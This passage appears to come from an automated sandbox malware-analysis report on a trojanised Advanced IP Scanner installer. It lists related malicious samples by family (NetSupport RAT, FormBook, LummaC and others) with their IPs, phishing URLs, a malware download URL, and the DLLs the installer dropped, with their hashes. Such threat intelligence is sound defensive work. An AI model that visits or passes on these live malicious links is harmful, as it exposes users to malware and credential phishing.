	Play_VM_00_01_22sec-ATT212monika.hayward@bostonbeer.com.html	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	162.0.238.119
	xxTupY4Fr3.xlsx	Get hash	malicious	Unknown	Browse	63.250.43.10
	RO2Y11yOJ7.exe	Get hash	malicious	FormBook	Browse	192.64.118.221
	https://login-zendesk-account.servz.com.pk	Get hash	malicious	HTMLPhisher	Browse	63.250.47.132
	https://login-zendesk-account.servz.com.pk	Get hash	malicious	HTMLPhisher	Browse	63.250.47.132
	https://login-zendesk-account.servz.com.pk	Get hash	malicious	HTMLPhisher	Browse	63.250.47.132
	xBzBOQwywT.exe	Get hash	malicious	FormBook	Browse	199.192.19.19
	https://google.com:login@login-zendesk-account.servz.com.pk/index.html	Get hash	malicious	HTMLPhisher	Browse	63.250.47.132
HVC-ASUS	Payload 94.75 (3).225.exe	Get hash	malicious	Unknown	Browse	104.254.128.202
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
	PO-33463334788.exe	Get hash	malicious	Remcos, GuLoader	Browse	23.227.202.197
CLOUDFLARENETUS	72BF1aHUKl.msi	Get hash	malicious	NetSupport RAT	Browse	172.67.68.212
	https://nleco-my.sharepoint.com/:u:/p/smartin/EYZSur4py4xKna-WAI8lgIkBS_KVLZwaA2d1wGxZA5Gdvw?e=wwT7sT	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.18.95.41
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	pago de PEDIDO PROFORMA.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	188.114.96.3
	http://jobs.sixlfags.com	Get hash	malicious	Unknown	Browse	104.21.43.150

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	https://download.advanced-ip-scanner.com/download/files/Advanced_IP_Scanner_2.5.4594.1.exe	Get hash	malicious	Unknown	Browse
	Advanced Scanner.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	ip_scan_en_us_Release_2.5.4594.1.msi	Get hash	malicious	CobaltStrike	Browse
	ipscan.msi	Get hash	malicious	Darkgate	Browse
	Advanced_IP_Scanner.exe	Get hash	malicious	DanaBot	Browse
	Advanced_IP_Scanner.exe	Get hash	malicious	DanaBot	Browse
	IPAVSCAN_win_version_1.1.3.msi	Get hash	malicious	Unknown	Browse
C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	https://download.advanced-ip-scanner.com/download/files/Advanced_IP_Scanner_2.5.4594.1.exe	Get hash	malicious	Unknown	Browse
	Advanced Scanner.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	ip_scan_en_us_Release_2.5.4594.1.msi	Get hash	malicious	CobaltStrike	Browse
	ipscan.msi	Get hash	malicious	Darkgate	Browse
	Advanced_IP_Scanner.exe	Get hash	malicious	DanaBot	Browse
	Advanced_IP_Scanner.exe	Get hash	malicious	DanaBot	Browse
	IPAVSCAN_win_version_1.1.3.msi	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\Advanced IP Scanner\Advanced_IP_Scanner.ico (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	MS Windows icon resource - 9 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
Category:	dropped
Size (bytes):	25214
Entropy (8bit):	5.181706176676903
Encrypted:	false
SSDEEP:	192:gZwwfjXDaFoDU90fQNBYNK30CCl77nQ6jtCuZEaaX/bv+NZmQDtLQIRLdc8ZDeO4:qLXDTQCQNmNa0CCl77nQ6viv6t2tMA
MD5:	3511FCBA762713FBC4D83979F300A383
SHA1:	61C33483A70C253FF38222021AD05E599F11E05C
SHA-256:	AD6B11E0F7B0E9DDD0B3440AA0C9308F18E385C7EBB78452A964F77A104B789E
SHA-512:	2CA49AE53A97FDD8AA857DFFFF281501506BAC8BD6B0D76B94CDA65592492A7DAA29FEC2CFD912DDBDCDEDEFF104BD21B00B2DED958C8BA7567536AFABE4D639
Malicious:	false
Reputation:	low
Preview:	..............(...............h....... ..........&... ..............00......h.......00.................... .h....'.. .... ......,..00.... ..%...<..(....... ...............................................................................................0...33..;...;.....ffo..6...3...o...`...o...`...o...`...o...`...o...o.......ww...ffn......n.......n.......fffg.................................................................................(....... ...........@.......................B...!{..cs..{{{.sss.{sk..s...Z...c..{ss.1...9......................9...s....R..............)...!{...1..{....9.................B....B................{..!........J.........{)...s..........k...........{c..B.................!..)...B...9.....................{...c...R...!......1...1.......................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5987880
Entropy (8bit):	6.645849589307296
Encrypted:	false
SSDEEP:	98304:I9HgaLmICbZhV8cBfAVG4F40zkpEJsv6tWKFdu9CcDo+fN4A:I9Hgaq5b7OcBfAVG4FiEJsv6tWKFdu9V
MD5:	C2BB94B2C229ECE69D865B1898C71324
SHA1:	AFAC1A2FEDE68AD129BB48B01ED8B80997F75D2F
SHA-256:	193814D47E0B7917C3373011F64CD3AC649A16D1D0515C9D409FA1794C5BFFB1
SHA-512:	2CB31EB8FD866510268553B77D2BB4DDFFB4D48F22C35B8679933CB48AC7B90DE1AEFCF6132DBCEF007F6F622869C931BE13A5D41234E49E0C7DB3F8C5CF8B0A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: Advanced Scanner.exe, Detection: malicious, Browse Filename: ip_scan_en_us_Release_2.5.4594.1.msi, Detection: malicious, Browse Filename: ipscan.msi, Detection: malicious, Browse Filename: Advanced_IP_Scanner.exe, Detection: malicious, Browse Filename: Advanced_IP_Scanner.exe, Detection: malicious, Browse Filename: IPAVSCAN_win_version_1.1.3.msi, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.............s...s...s......s.\S....s..w...s..p...s..v...s..r...s..w...s..u...s..r...s...r...s...w...s...v...s...s...s.......s.......s...q...s.Rich..s.................PE..L.....%^...........!......7...$.....\|m5.......7....g..........................[.......[...@..........................eS.....\|zY.\|....0Z..............B[.(....@Z.8.....P.T.....................P.......P.@.............7..............................text.....7.......7................. ..`.rdata..4.!...7...!...7.............@..@.data...L.....Y..2....Y.............@....rsrc........0Z.......Y.............@..@.reloc..8....@Z.......Y.............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6708264
Entropy (8bit):	6.661851136227646
Encrypted:	false
SSDEEP:	98304:YMm4f0AN5rHUQ+P2DkVNYVBcE7hxc5Rar3v:Yb4fzN5rHUj+D5VBckhkRGv
MD5:	1FBE59E9BE0F445BB14BE02C0EE69D6F
SHA1:	98F62A873CA78E9BE7760DE0FDDEDC56FAE2505D
SHA-256:	F201494B5EBE609FF2CA7D36275B19AB645C81153417B5FF4852AD8E164E144D
SHA-512:	00A61EB5B7B412CFF8BB92157DD2330FC7729C23E82A6C9648C067581DDF91E0743EC5CF4B3D4D59EA49C7EDCDA63DBF39350A173A354EC465E3F5A5D087F24F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: Advanced Scanner.exe, Detection: malicious, Browse Filename: ip_scan_en_us_Release_2.5.4594.1.msi, Detection: malicious, Browse Filename: ipscan.msi, Detection: malicious, Browse Filename: Advanced_IP_Scanner.exe, Detection: malicious, Browse Filename: Advanced_IP_Scanner.exe, Detection: malicious, Browse Filename: IPAVSCAN_win_version_1.1.3.msi, Detection: malicious, Browse
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........#..B}..B}..B}..:.B}.+..B}../y..B}../~..B}../x..B}../\|..B}.\|/\|..B}..*\|..B}..B\|.#G}.\|/y..B}.\|/x..C}.\|/}..B}.\|/...B}..B.B}.\|/...B}.Rich.B}.........................PE..L.....%^...........!......E...".......E......0E..............................`g.......f...@.........................P.J..`..,Gb.@.....d..............@f.(.....d.\....rJ.T....................sJ......sJ.@............0E.4............................text...O.E.......E................. ..`.rdata..,....0E.......E.............@..@.data....A...0c..\....c.............@....rsrc.........d......xc.............@..@.reloc..\.....d......~c.............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1151016
Entropy (8bit):	6.482547207070433
Encrypted:	false
SSDEEP:	24576:Ql4zuvU31UisunBgeZaGKYbmYccwy9v5nOUhqJEe:Ql4q8lUd2z3mYVBb8H
MD5:	ED04DAB88E70661E4980A284B0DF6A0C
SHA1:	C1499360A68FDC12013A6CBB35C05A3098E95F41
SHA-256:	9AFF2CCBD77806D7828CE99481104515FA34859499C0A17FFE4785DE44E0A2F9
SHA-512:	E2B41A7A80216ECC9ADDE467E9DA84C39A4C593C0D3928442C0AC079F8D854A3605DF9E93A1408C0042F5C4D2A41CBBA281BBBB3524F5BE8F4E5DAFEA048E87A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)>..Gm..Gm..Gm...m..Gm..Fl..Gm..Bl..Gm..Cl..Gm..Dl..GmO.Fl..Gm.Fl..Gm..Fm..GmO.Bl..GmO.Gl..GmO..m..Gm...m..GmO.El..GmRich..Gm........................PE..L.....%^...........!.....0...v.......4.......@.....d......................................@.............................d$..t........................t..(...........@...T...................<...........@............@..\............................text............0.................. ..`.rdata...N...@...P...4..............@..@.data...4I..........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	327208
Entropy (8bit):	6.804582730583226
Encrypted:	false
SSDEEP:	6144:zqg47yYJkKxQ8WVauJIg9FzQGRPvhUhcD3I95HIbPSRyuoboXHcJ2ZWa3Imr1y6a:LgTxQ3UuJIg9FzQGRPvlf
MD5:	72B2E7A9AF236E5CA0C27107E8C5690C
SHA1:	6AC273911118C7CAA71818C55E22D27B4C36B843
SHA-256:	725DD45CF413D669D22FD38BAFFB5296BD2FEC4C0379A1FA3ABA4CC12C41768A
SHA-512:	C4D217EB21501E1A26AFA5A6CB5B53152F6330A96A58B83709BE2C615594E1D640DD65E5353AD8CD2E7E3B4EABBB8E3AFF0F5D13D5577A1CCC05B590CC9803B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........k...8...8...8.*8...8..9...8..9...8..9...8..9...8...9...8...9...8...8..8...9...8...9...8..F8...8...8...8...9...8Rich...8................PE..L...t.%^...........!.....z...j......T.....................................................@..........................}...k..............................(........7...a..T....................b.......a..@............................................text....x.......z.................. ..`.rdata...............~..............@..@.data...............................@....rsrc...............................@..@.reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5735464
Entropy (8bit):	6.639119541918398
Encrypted:	false
SSDEEP:	49152:hQQeqQ4ZHCscH74ar0+qrlOjvuzu7mA4a59KEyhRO6LyUfqcVeaXafSKHZV+gZtK:hzeqxHCTf4+qwGLW9sRO6XW+I9ipjN
MD5:	41C0478595550900E33B52B8CDBEDEAA
SHA1:	0550C6434EF71260D3581CE2A90F080DE93E01D6
SHA-256:	44E495DE09B59E66FDF0C1C65A2070A4CE95BAAF4169C875DEA0590BD37342BD
SHA-512:	9302EDB0DE46E0F132271532140F19D1C3B9DCE0D1F11046148E6DC81C689A07256928839FF0D64708A718004E1F216BE0F64C5C9B05CC1C612B6E0E71CC442D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q...}...}...}.......}.......}.......}.......}.......}.......}..N....}...}..cp......}.......}....y..}...}...}.......}..Rich.}..........................PE..L.....%^...........!.....H>..J.......J>......`>....e..........................W.....h.X...@..........................ZI.D...T.Q......0T..............hW.(....@T.....prH.T...................lsH......rH.@............`>.l5...........................text....F>......H>................. ..`.rdata...2...`>..4...L>.............@..@.data........S..Z....S.............@....rsrc........0T.......S.............@..@.reloc.......@T.......S.............@..B................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	498216
Entropy (8bit):	6.392626000362742
Encrypted:	false
SSDEEP:	6144:lOssvQ+soy9eQdVgSTZuyvDTSVHyZ1Hy6:lsYvo4eQdKzW
MD5:	C80BA989BA52F73AD4332EA7B3BE0499
SHA1:	F4A2A70F2E23DB44AEC358F3DD282E68483AC631
SHA-256:	C86C36B20B602D6A063575136ECB417EB0A7AD8DDDBB966750FA348FEB74D309
SHA-512:	255862D9678F5380581F9C728327C3EA83D724A163ED35FA18BE22C35415E0E2819B8A4D2EACC0D94E53C5C3AB3D62AA2E978EF7C4F281C173C1C0A050A8EB5C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.!...O...O...O.......O...N...O...J...O...K...O...L...O.X.K...O.X.N...O...N...O...N...O...J...O...O...O......O.......O...M...O.Rich..O.........PE..L.....&^...........!.....Z...`.......\.......p............................................@..........................{...8..\........0...............~..(....@..,....p..T....................q.......p..@............p...............................text...,X.......Z.................. ..`.rdata...j...p...l...^..............@..@.data....B..........................@....rsrc........0......................@..@.reloc..,....@......................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	228904
Entropy (8bit):	6.499413249756033
Encrypted:	false
SSDEEP:	3072:5vv6tCZo5oOM7fpXiUpuF007hkeWPp4bjUAIt1zG0jvbkEV3:56tb5NM7fpXiUkFdNqB4Gt1zG0h3
MD5:	0B4816D5308825B9C24FAA83CE4CB1F0
SHA1:	0EEFEF3564356B50D5B360DC4B8D8D316C99B210
SHA-256:	F10815CB6F99FA795B69FB547BA4376A336F46BC1FA279B486A24AD96FD74525
SHA-512:	806B6B203D73D08E127365C87A9AF98811E1C93568F66DFBFAE41EE13C97AC3FE623D42BC1A1FFFE36669B14E0F4E39499EC177ECA39B7339F57E50C97B20B2B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>..._.,._.,._.,.'],._.,.2.-._.,.7.-._.,.2.-._.,.2.-._.,.2.-._.,Q2.-._.,._.,\_.,Q2.-._.,Q2.-._.,Q21,._.,._Y,._.,Q2.-._.,Rich._.,................PE..L.....%^...........!..............................a................................?\....@.............................T\..4)..x....`...............b..(....p..."..0...T...............................@............................................text............................... ..`.rdata..............................@..@.data........P.......2..............@....rsrc........`.......8..............@..@.reloc..."...p...$...>..............@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1681960
Entropy (8bit):	6.535592110075899
Encrypted:	false
SSDEEP:	49152:N7MNjXLsvFfAhpjccQ1hhTlPrLFhNG2y+L+aJwDcN:0jXL2mboRRhrL42yE
MD5:	B3411927CC7CD05E02BA64B2A789BBDE
SHA1:	B26CFDE4CA74D5D5377889BBA5B60B5FC72DDA75
SHA-256:	4B036CC9930BB42454172F888B8FDE1087797FC0C9D31AB546748BD2496BD3E5
SHA-512:	732C750FA31D31BF4C5143938096FEB37DF5E18751398BABD05C01D0B4E5350238B0DE02D0CDFD5BA6D1B942CB305BE091AAC9FE0AAD9FC7BA7E54A4DBC708FD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$........lj..............u........j......x.......x.......d.......f.......x.......x.......f.......c.......c.......f..............'x......'x..`...'x..............'x......Rich............................PE..L....gb..........".................U.............@..........................P............@..................................3.......... p..............(....p..0....R..T....................S.......R..@...............d*...........................text.............................. ..`.rdata..b...........................@..@.data........0...4..................@....rsrc... p.......r...H..............@..@.reloc..0....p......................@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ar_sa.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26334
Entropy (8bit):	5.237840743757654
Encrypted:	false
SSDEEP:	384:sIX3LNpZy4imY2tBA01s0iMJ/vZYM2jeFxikFq2pkMPcK8LM+OEM4q78nkL9BHDS:TX3xpZy4BaMJ/vZJ2jeFxieN8LMkpk6
MD5:	6AB50593778FB5BD5D5422BDD90595E6
SHA1:	282946268660F41A7484BF19C30B7B958F6A82D4
SHA-256:	132676D1F5044AE5249B764B0CD4B67993932D121FBDDC13DB2AE75961562F0F
SHA-512:	359B8EE830E74575BDB7519F98180DD3440BBBE03DE9247F2FCF6A3EFD721DD1F56DB96DBF0D47E847EA6B6365BD5AD97DF6D5B277F5926622918FF05578DB37
Malicious:	false
Preview:	<.d....!..`...B..........R....;...J...;...c...;.......;.......;..>....O..U....[..Q....^..+....^..M...(5...y..G.......H,..J...K...:...N:......V...?..._...V.......%.......K....y..Ki......................R....t..'....t..K....t..UK.....<....j......5t......@...=...H5..S...f...+.......@........;...........~...l...`..2....e..T.......T.......... =...A...y......y......%..!...0..!..+.....+.+.......+....Z.+....$.+....#..G.......G....'].H0...U%.Hw9.....Hw9.....I....%^.J6......J6......J6......J6...D).LD....d.L.b..Ur.M.S..<j.R.....0.V....+..Wi...Tr.W.T...m.Z.\|..L..[f3..P..gc......w0K..B...H...".......VF...T...a..."..0L...~..2p.. d..@....T..*W..2...........S.......Y..9.E..;Z.L.#..\..M$o.....e.....".l8...2....^..D^..I....>......=.......MY......S...>......>...:..3..+e..l...E.......5..5.l..X..AV...%'.y....Q....0..N.......M.......SA..tb..1.......................Nk......8.......I..(....M..1V...&(.R....-..W.<..Y}.f.~...f....../...1........^..1k...5..............c..A@.;6...[..q.J..JL..I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_bg_bg.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28561
Entropy (8bit):	5.2596092915719215
Encrypted:	false
SSDEEP:	768:O4suMMyQmmoRKIKfAoMzI4VxECTwTPJBLCsDbn:tsuMMypm/M04MCYTL/n
MD5:	1D2AAC0633801D7DEF387CF78A968BFF
SHA1:	D4721BBF3AA690683DCD75B690080A9785BF81B5
SHA-256:	8FDF83BEB8D7E9D3CD0B77DDC636A77A1E4FF591ED10851229ED49BDC78644DF
SHA-512:	956759A441647A00FCEA9AA4BE7DBA4463DDC6DA2EBBBFDF697BAED99CEF55B924D72F92E3443251C5C64927FF37DE345F95C366920ADFE829823105C3EB0673
Malicious:	false
Preview:	<.d....!..`...B..........[H...;...D...;.......;.......;..!....;..Ef...O..^,...[..Y....^..0....^..U...(5...m..G.......H,..R...K...A...N:......V...F..._..._`......).......R....y..S........7..............[ ...t..+O...t..S....t..]......B....j......5t...y..@...D}..H5..[...f...1!......Gn.......a...........~..4....`..9....e..]E......]k......... =...H...y...f..y...u..%..%F..0..%o.+.......+.......+......+......+....'..G.... ..G....+..H0...]..Hw9.....Hw9.....I....)@.J6......J6......J6......J6...K#.LD......L.b..^..M.S..C..R.......V....1O.Wi...\..W.T.....Z.\|..Tm.[f3..Xd.gc......w0K..I...H...&-......^....T......."..6....~..8... d..G....T../W..2...........\L......b..9.E..B..L.#..e_.M$o...\.e.......l8...83...^..K`..I....J......D.......U_......\...>......>...z..3..0...l...L.......;..5.l..a..AV...(..y....ZW...0..V8......U.......[...tb..7.......................V.......?4......Q..(....U..1V...*&.R....2..W.<..b..f.~..".......5...1....g...^..7....5...[..........c..H@.;6...c..q.J..Q...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	389160
Entropy (8bit):	6.42467668414915
Encrypted:	false
SSDEEP:	6144:KsFG7TN7RchK49w1j0GqH8HQQG16lNWjL2D7hn1WMrNayAAXe0jvYE:LgTN7RWK+PH2llNWGXRay7e0b1
MD5:	12BF5F988FF62C112FAC061D9EC97C47
SHA1:	C4E01DE097C1564872F889C5BBBD8D0559EDAE73
SHA-256:	BE2B45B7DF8E7DEA6FB6E72D776F41C50686C2C9CFBAF4D456BCC268F10AB083
SHA-512:	4B389005D647BC2108303C6E78F648D768D3F75ED84F694E75B54B95166E1569D1650508375514CB0FA0FB2F5DFC49CBD4DE1D6FA376FBA8619645EE2BC08104
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......6 .yrA.rA.rA.{9w\|A.f.+sA.U..sA.* 4.+RA.* 4.+~A.* 4.+vA..(.+pA. 4.+vA.f.+sA.f.+nA../.+wA.rA..C..4.+sA..4.+#A..4.sA.rAssA..4.+sA.RichrA.................PE..L...U.gb.........."..........R....../X............@..........................P.......[....@.........................................p..@p..............(.......$X......T...............................@............................................text............................... ..`.rdata...$.......&..................@..@.data...._..........................@....rsrc...@p...p...r..................@..@.reloc..$X.......Z...z..............@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_cs_cz.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28199
Entropy (8bit):	4.76848600543852
Encrypted:	false
SSDEEP:	384:7zGw8sjK6qVziPNAsFApjRkBmPNsGYR8XQrjxpi5Qg7C/XoVsLf7ra3sEYUq:3Gw8B6qVePNAPjuYPNHAnxW7qoVsLff
MD5:	7C52599AA9F2C07DCC95378CA4BECD86
SHA1:	73831CA352BED5C6764BCB544301396C55706E6D
SHA-256:	B495F4FF61EBB88402BCD068BFD3C7EAD171CABE68C9312280F1EBAA32CCEB6F
SHA-512:	340EFFF03017538F010D7FB83BE1407E255D479A41B177189220F5D1D8D4BB6E3F668473AAAB35BFD7D8FA4742FC970E061AD0F16A1E3AE5D28DB1F0958DF1EE
Malicious:	false
Preview:	<.d....!..`...B..........Z....;.......;.......;.......;..!k...;..C....O..\....[..X....^..0....^..T6..(5......G....\..H,..Q"..K...@P..N:...@..V...EA.._...].......).......QK...y..Q................x......Y....t......t..RH...t..\o.....AB...j...o..5t......@...C...H5..Z...f...01......F....................~..3....`..7....e..[.......\........:. =...G...y......y...I..%..$..*.0..%..+.....K.+.......+....z.+......+....&..G.... {.G....+=.H0...\A.Hw9...g.Hw9.....I....(..J6....V.J6......J6......J6...I..LD......L.b..\..M.S..A..R.......V....0].Wi...[..W.T.....Z.\|..S..[f3..V..gc....L.w0K..HD..H...%.......]x...T......."..5....~..7... d..F....T......2....%......[.......aW.9.E..@..L.#..c..M$o.....e.......l8...6....^..I...I....f......CH......S.......Z...>...)..>......3../...l...KL......:>.5.l..`E.AV...(m.y....X....0..T.......S.......Zc..tb..5.......................U/......=.......O..(....T\.1V...)..R....1..W.<..`..f.~..">......4...1....+...^..6%...5..............c..F..;6...bk.q.J..P...I....!..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_da_dk.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26959
Entropy (8bit):	4.713288631353564
Encrypted:	false
SSDEEP:	384:ihIXQdwIyWqLSTgN1YYgX+9S1Dk+nK+sF7SVLHElRh:3XQdwIUCgN1YYgE2k1A4
MD5:	AE4754AC60C32B9D44B47CAA489E5337
SHA1:	6C3AEC0A9EF0945C06562D0ACD0E0558E18992AD
SHA-256:	D09D333B00D073C09837F669D7A8DDD77D50B2D94A177E58CE556AF83700371A
SHA-512:	74710A20298F162D6BE02F7BCBB964E447345D219887216366A7DCD283267A708666E974195F279E384526E324E27F0FBD713411E6BA58DE266069143575C6DC
Malicious:	false
Preview:	<.d....!..`...B..........U....;.......;.......;.......;.. A...;..@....O..XZ...[..TL...^...1...^..P:..(5......G....6..H,..MT..K...=@..N:...,..V...B#.._...Yn......'.......M....y..M.......................U~...t..)I...t..NV...t..X......>....j...[..5t...-..@...?...H5..V?..f....W......B........u.......Y...~..1....`..5....e..W.......W........:. =...C...y...B..y...E..%..#...0..#..+.......+.......+......+......+....%q.G.....g.G....)..H0...W..Hw9...g.Hw9.....I....'T.J6......J6....@.J6......J6...Fo.LD......L.b..X2.M.S..>..R.....\.V.....{.Wi...W4.W.T.....Z.\|..O..[f3..R..gc....~.w0K..E...H...$w......X....T......."..2....~..4... d..Cc...T..,...2...........V.......\..9.E..=..L.#.._!.M$o.....e.......l8...4c...^..F...I....L......@"......O.......Vg..>......>...n..3..-...l...H*......7..5.l..[..AV...'..y....T....0..P.......O.......V...tb..3z.......s.......y......Q.......:.......L..(....Pf.1V...($.R....0).W.<..\).f.~..!.......2r..1........^..3....5..............c..C..;6...]..q.J..L...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_de_de.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28739
Entropy (8bit):	4.641812949957873
Encrypted:	false
SSDEEP:	384:fCwKr9wd6dllAddv/+l8hPMaupXxkMwWEXkw7NLgADR1w:fsrzdllA7H+l8hEOMwWWvA
MD5:	65A1638D5074FA60210BB5B67A4E3DB3
SHA1:	4A6B5C87D49F665BCECD0248ED0FB3BBCDF07682
SHA-256:	23B63D04EEFAE8E50FFC6963C1E45511C7D034D54F94B17C9B1B53F899BFB340
